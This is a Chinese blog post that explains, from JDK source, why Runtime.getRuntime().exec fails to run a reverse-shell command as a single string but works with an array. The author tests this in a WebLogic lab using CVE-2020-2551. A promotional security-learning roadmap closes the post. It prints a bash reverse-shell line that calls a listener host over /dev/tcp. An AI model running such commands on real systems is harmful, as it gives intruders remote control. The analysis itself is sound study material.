前言

遇到很多次在调用Runtime.getRuntime().exec方法进行弹shell的时候遇到的各种限制，都没好好的认识认识原理，这次主要是总一个总结和原理上的分析。

环境搭建

之后使用docker起一个具有反序列化的漏洞的Java服务(能够执行命令就行)。

之后开启调试的功能，

我这里直接就是用存在的weblogic的漏洞环境，直接通过发送T3协议数据包来触发反序列化漏洞。

起因

我这里使用的是CVE-2020-2551进行利用，

我们首先进行curl命令执行看看是否可以执行命令。

接下来我们使用反弹shell的命令尝试

bash -i >& /dev/tcp/192.168.153.1/8080 0>&1

按照正常的逻辑，应该会成功的啊？！

但是，并没有，如图：

细节

我们跟进一下Runtime执行命令的源码。

因为对于linux和windows版本的JDK有一点小区别，所以我这里在项目依赖的位置将windows版的rt.jar包替换成了linux版的rt.jar包。

好了，言归正传，开始分析Runtime.getRuntime().exec执行命令的逻辑了。

在Runtime类中的exec方法存在有多个重载，大致可以分成传入的参数是一个字符串，或者是一个字符串数组进行命令执行。

字符串执行

我们首先来看看字符串作为参数的情况是怎么样的。

在这个方法中将会调用this.exec((String)var1, (String[])null, (File)null)方法继续进行调用。

在这个方法中，首先是传入的命令不能为空，不然会抛出异常，之后主要是创建了一个StringTokenizer对类对象，传入的构造方法参数是我们需要执行的命令字符串。

从该方法的注释中也能够看出端倪来。

使用通过调用 new StringTokenizer(command) 创建的 StringTokenizer
将命令字符串分解为标记，而无需进一步修改字符类别。分词器生成的分词然后以相同的顺序放置在新的字符串数组 cmdarray 中

所以我们可以跟进StringTokenizer类的构造方法中

为指定的字符串构造一个字符串分词器。分词器使用默认的分隔符集，即“\t\n\r\f”：空格字符、制表符、换行符、回车符和换页符。

也就是使用这个类将命令字符串中跟据\t\n\r\f等字符来进行分割成一块块的数组，

主要的实现方法就是在exec方法中，首先调用StringTokenizer#countTokens来初始化cmdarray这个数组对象。

主要是利用skipDelimiters / scanToken这两个方法来进行切片操作的

之后就是调用nextToken方法来为前面初始化的数组进行赋值操作

在分割成了数组之后调用exec的重载方法public Process exec(String[] cmdarray, String[] envp, File dir)

终归还是回到了ProcessBuilder类对象的创建来，在Java中另一种执行命令的方式就是通过调用ProcessBuilder#start()方法来执行命令。

这里进行了environment /
工作目录的初始化之后调用了start方法进行命令执行操作。

这里获取的是命令字符串的分割之后的第一块，这个就是该命令执行的环境，比如/bin/sh / /bin/bash这些。

可以注意到在其后面有一个System.getSecurityManager方法的调用，这个就是通过调用checkExec方法来判断该次的命令调用是否合法，也是Java内置的一种安全管理。

之后就是调用ProcessImpl.start方法进行执行了，

最后将会创建一个UNIXProcess类对象。

传入的第一个参数是/bin/bash这种运行环境，第二个参数就是后面紧跟的需要执行的命令，

在这个类构造方法中，将会通过调用forkAndExec方法来创建了一个进程该方法返回了该进程的PID号。

总结

使用Runtime.getRuntime().exec()方法执行命令的时候，会将传入的字符串命令，根据\t\n\r\f等分隔符进行分割，之后在进行命令的执行。

数组执行

如果传入的参数是一个数组对象，来到的具体代码就是在public Process exec(String cmdarray[])方法的调用中。

直接就来到了exec的重载方法public Process exec(String[] cmdarray, String[] envp, File dir)

在这个方法中，直接就将该数组对象传入的ProcessBuilder的构造方法中，之后调用start方法进行执行。

总结

使用exec的数组作为参数传入的重载方法，不同于使用字符串的重载方法进行命令执行，

具体到代码中就是少了一步通过创建了一个StringTokenizer类对象来自动进行命令的分割，在某些情况下，将会造成命令不能执行的情况，

数组方式是直接传入的自己已经分好块的命令数组进行命令执行，Java便不会自动将本应该在一起的命令分割开来造成错误。

具体到代码中就是少了一步通过创建了一个StringTokenizer类对象来自动进行命令的分割，在某些情况下，将会造成命令不能执行的情况，

数组方式是直接传入的自己已经分好块的命令数组进行命令执行，Java便不会自动将本应该在一起的命令分割开来造成错误。

最后

分享一个快速学习【网络安全】的方法，「也许是」最全面的学习方法：
1、网络安全理论知识（2天）
①了解行业相关背景，前景，确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。（非常重要）

2、渗透测试基础（一周）
①渗透测试的流程、分类、标准
②信息收集技术：主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理，利用方法、工具（MSF）、绕过IDS和反病毒侦察
④主机攻防演练：MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础（一周）
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全（系统入侵排查/系统加固基础）

4、计算机网络基础（一周）
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析（HTTP、TCP/IP、ARP等）
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御：主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作（2天）
①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透（1周）
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具：Nmap、BurpSuite、SQLMap、其他（菜刀、漏扫等）

恭喜你，如果学到这里，你基本可以从事一份网络安全相关的工作，比如渗透测试、Web 渗透、安全服务、安全分析等岗位；如果等保模块学的好，还可以从事等保工程师。薪资区间6k-15k。

到此为止，大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗？

想要入坑黑客&网络安全的朋友，给大家准备了一份：282G全网最全的网络安全资料包免费领取！
扫下方二维码，免费领取

有了这些基础，如果你要深入学习，可以参考下方这个超详细学习路线图，按照这个路线学习，完全够支撑你成为一名优秀的中高级网络安全工程师：

高清学习路线图或XMIND文件（点击下载原文件）

还有一些学习中收集的视频、文档资源，有需要的可以自取：
每个成长路线对应板块的配套视频：


当然除了有配套的视频，同时也为大家整理了各种文档和书籍资料&工具，并且已经帮大家分好类了。

因篇幅有限，仅展示部分资料，需要的可以【扫下方二维码免费领取】